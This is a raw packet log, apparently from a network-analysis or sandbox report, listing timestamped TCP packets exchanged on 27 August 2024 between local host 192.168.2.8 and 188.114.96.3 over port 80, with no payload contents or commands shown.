                                Aug 27, 2024 09:49:38.098638058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098639011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.098649979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098659992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098673105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098807096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098819017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098828077 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.098829031 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098843098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098866940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098867893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.098879099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.098881960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.098896027 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099044085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099055052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099061012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099066973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099071980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099082947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099095106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099104881 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099109888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099172115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099251986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099263906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099275112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099288940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099312067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099348068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099359989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099370003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099379063 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099380970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099394083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099406004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099406004 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099442959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099479914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099492073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099528074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099536896 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099539995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099550009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099561930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099574089 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099581957 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099643946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099656105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099684000 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099759102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099770069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099781036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099792004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099805117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099806070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099814892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099853992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099900007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099905014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099921942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099934101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099944115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099945068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099955082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099967003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099976063 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.099977970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099989891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.099996090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100012064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100060940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100101948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100140095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100152969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100162983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100176096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100186110 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100194931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100208998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100219011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100222111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100233078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100256920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100265980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100307941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100378990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100392103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100445032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100447893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100455999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100466967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100478888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100495100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100506067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100522995 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100548983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100641966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100653887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100667953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100681067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100692987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100703955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100716114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100729942 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100749969 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100764036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100893974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100904942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100915909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100935936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100946903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.100948095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100959063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100970984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.100982904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101002932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101013899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101161003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101172924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101185083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101197004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101207972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101219893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101227045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101232052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101243019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101248980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101257086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101264954 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101284027 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101476908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101489067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101505041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101516962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101527929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101537943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101547956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101548910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101561069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101564884 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101573944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101586103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101593018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101598978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101613045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101632118 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101738930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101749897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101761103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101780891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101789951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101799965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101813078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101824999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101831913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101836920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.101844072 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.101910114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.184986115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185065985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185118914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185136080 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.185170889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185225010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.185224056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185275078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185311079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185338974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.185487032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185539961 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.185653925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185666084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185678005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185689926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185703039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.185709000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185722113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185734034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185738087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.185751915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185764074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185774088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185786963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185792923 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.185798883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185815096 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.185836077 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.185918093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185930967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185941935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185954094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185965061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185980082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.185988903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186063051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186077118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186086893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186096907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186120033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186122894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186135054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186146975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186161995 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186184883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186275959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186288118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186300039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186311007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186323881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186326981 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186333895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186352015 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186362028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186484098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186496019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186506033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186525106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186536074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186539888 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186603069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186633110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186644077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186656952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186667919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186675072 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186681032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186686039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186722040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186738014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186749935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186760902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186772108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186784983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186814070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186935902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186947107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186959028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186970949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186984062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.186995029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.186996937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187009096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187021971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187026024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187027931 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187091112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187279940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187294006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187304974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187316895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187331915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187347889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187350988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187360048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187371969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187382936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187396049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187407017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187428951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187457085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187477112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187488079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187499046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187511921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187520027 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187526941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187536001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187537909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187561989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187623024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187634945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187647104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187658072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187663078 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187671900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187683105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187707901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187783003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187794924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187805891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187818050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187829971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.187834024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187894106 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.187999964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188011885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188023090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188034058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188046932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188052893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188059092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188071012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188107014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188131094 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188139915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188152075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188163042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188175917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188188076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188199997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188200951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188226938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188236952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188270092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188281059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188292980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188304901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188313961 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188322067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188333035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188344955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188352108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188355923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188369989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188400030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188513041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188524961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188572884 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188662052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188673973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188683987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188695908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188714027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188725948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188738108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188739061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188760042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188765049 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188771963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188781977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188793898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.188796997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.188817978 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.242415905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.272052050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272109032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272144079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272176981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272192001 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.272211075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272243977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272268057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.272278070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272294998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.272309065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.272356987 CEST4971580192.168.2.8188.114.96.3
